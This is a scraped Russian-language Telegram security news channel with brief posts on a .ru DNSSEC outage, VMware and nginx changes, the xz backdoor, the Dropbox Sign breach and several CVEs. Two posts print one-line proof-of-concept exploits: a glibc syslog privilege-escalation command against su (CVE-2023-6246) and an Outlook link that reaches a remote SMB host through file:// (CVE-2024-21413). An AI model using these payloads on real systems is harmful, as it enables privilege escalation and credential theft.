Информационная опасность – Telegram
Информационная опасность
1.12K subscribers
182 photos
20 videos
7 files
86 links
Download Telegram
⚡️⚡️⚡️ У зоны RU сломался DNSSEC
Отец знакомого работает в ICANN. Сегодня срочно вызвали на совещание. Вернулся поздно и ничего не объяснил. Сказал лишь переслать hosts. Сейчас едем куда-то далеко за город. Не знаю что происходит, но мне кажется началось...
😁4🥰1
Теперь SLA 99,999% придется держать базар.
🚬 Домены .ru регистрируются, но на серверах не появляются и пользоваться ими нельзя. Нельзя так же сменить NS или ключи DNSSEC для своих доменов второго уровня в .ru
Linux LPE- CVE-2023-6246: Heap-based buffer overflow in the glibc's syslog
POC (exec -a "printf '%0128000x' 1" /usr/bin/su < /dev/null). Ну и наверно много приколов принесет %0128000x, попавшее в сислог тем или иным способом и приводящее к сигфолту.
🚬 Сегодня отмечается День "Измените свой пароль"! Этот день напоминает нам о важности безопасности в сети и регулярного обновления паролей. Каждый из нас подвержен риску хакерских атак или киберпреступности, поэтому защита наших аккаунтов и личной информации должна быть приоритетом. Но давно пора переходить на passwordless технологии...
🍯🍯🍯 Слишком много хонейпотов. Вот тут подсчитали, что на 4200 реально торчащих в интернет Atlassian Confluence серверов приходится почти 235.000 приманок/honeypots. Honeypots — это очень хорошая возможность для защитников детектить вредоносную активность, но их растущая популярность значительно усложняет понимание реальной поверхности атаки и затронутых систем для защитников, а не только для злоумышленников.
This media is not supported in your browser
VIEW IN TELEGRAM
Извлечение ключей BitLocker из доверенного платформенного модуля на примере Lenovo X1 Carbon менее чем за минуту.
👍2😢1
Nginx от Рамблера дедушки ушел, потом от F5 бабушки ушел...

https://mailman.nginx.org/pipermail/nginx-devel/2024-February/K5IC6VYO2PB7N4HRP2FUQIBIBCGP4WAU.html
12 февраля 2024 года компания Broadcom, владеющая VMware, прекратила распространение бесплатных версий VMware vSphere Hypervisor ESXi 7.x и 8.x. Всё.

https://kb.vmware.com/s/article/2107518

Бесплатных продуктов от VMware теперь нет.

Давно пора тем кто еще не - переезжать на Proxmox.
👍1
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413 . Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019.

Уязвимость позволяет обходить встроенные защиты Outlook для вредоносных ссылок, встроенных в электронные письма, используя протокол file://, обращаясь через него к удалённому серверу злоумышленников.

Добавление восклицательного знака сразу после расширения документа позволяет обойти ограничения безопасности Outlook. В этом случае при нажатии на ссылку приложение будет обращаться к удалённому ресурсу и открывать целевой файл без вывода предупреждений или ошибок.

<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>

PoC
Такие дела.

Купил в магазине маленький вибратор. На нем есть колпачок, который снимается и появляется USB-порт для зарядки. Получается флешка с вибратором.

Без раздумий подключил его к компьютеру для зарядки.

Открыл веб-браузер, и тут же загрузился файл. Не открывая никаких веб-страниц, 🛡malwarebytes отметил его как вредоносное ПО и остановил загрузку.

https://www.reddit.com/r/Malware/comments/1asn02v/malware_from_a_vibrator/
🔌Когда мы подключаемся к VPN, нужно понимать, что передаем всю информацию на устройстве тем, кто этот трафик обеспечивает. В эфире МК объяснил суть запрета на распространение информации о способах и методах обхода блокировок, который вступил в силу сегодня, 1 марта.
В Красном море перебиты четыре подводных телекоммуникационных кабеля из полутора десятков, соединяющих Европу, Азию и Африку; речь идет о линиях связи Asia–Africa–Europe 1 (AAE–1), Europe India Gateway, Seacom и TGN, на которые приходится 25 % трафика в регионе; пострадавшие маршруты являются важнейшими для передачи данных из Азии в Европу — HGC Global Communications Limited.
Backdoor в xz/liblzma (атака на цепочку поставок)

Ну и кто добавил вредонос ?
*
А ноги растут из 2021 года, когда был создан акк JiaT75 на гите.
JiaT75 делает коммит, заменяя Safe_fprint небезопасным вариантом, делая еще одну потенциальную дырку.
*
В 2022 году добавляет патч к xz и появляется еще один коммитер Jigar Kumar.
Вместе они парят голову Лассе Колину (разраб xz) и патч мерджится.
Ребятам стали доверять и выдали креды к репозиторию.
*
В 2023 контактная почта в Google oss-fuzz меняется на JiaT75, а не на Лассе Коллина.
И коммиты понеслись....
*
В 2024 году ребята меняю URL tukaani.org/xz/ на xz.tukaani.org/xz-utils/ который далее уводит на гит JiaT75. Отжали проект. Далее добавляются последнии коммиты уже с бэкдором и шлюхами
Как был взломан Dropbox Sign

Злоумышленники взломали учетную запись службы в бэкенде Sign, у которой были привилегии для выполнения различных действий в продакшн среде. Затем они использовали этот доступ для получения доступа к базе данных клиентов.

В ходе расследования выяснилось, что злоумышленники получили доступ к данным, включая информацию о клиентах: электронную почту, имена пользователей, номера телефонов и хэшированные пароли.

Кроме того, были скомпрометированы конфигурации, информация о настройках, и информация об аутентификации, например, API-ключи, OAuth-токены и данные о многофакторной аутентификации пользователей.

Dropbox Sign взломали и слили всю базу, включая секреты для TOTP. Sign — это сервис, через через который можно шарить и подписывать документы онлайн.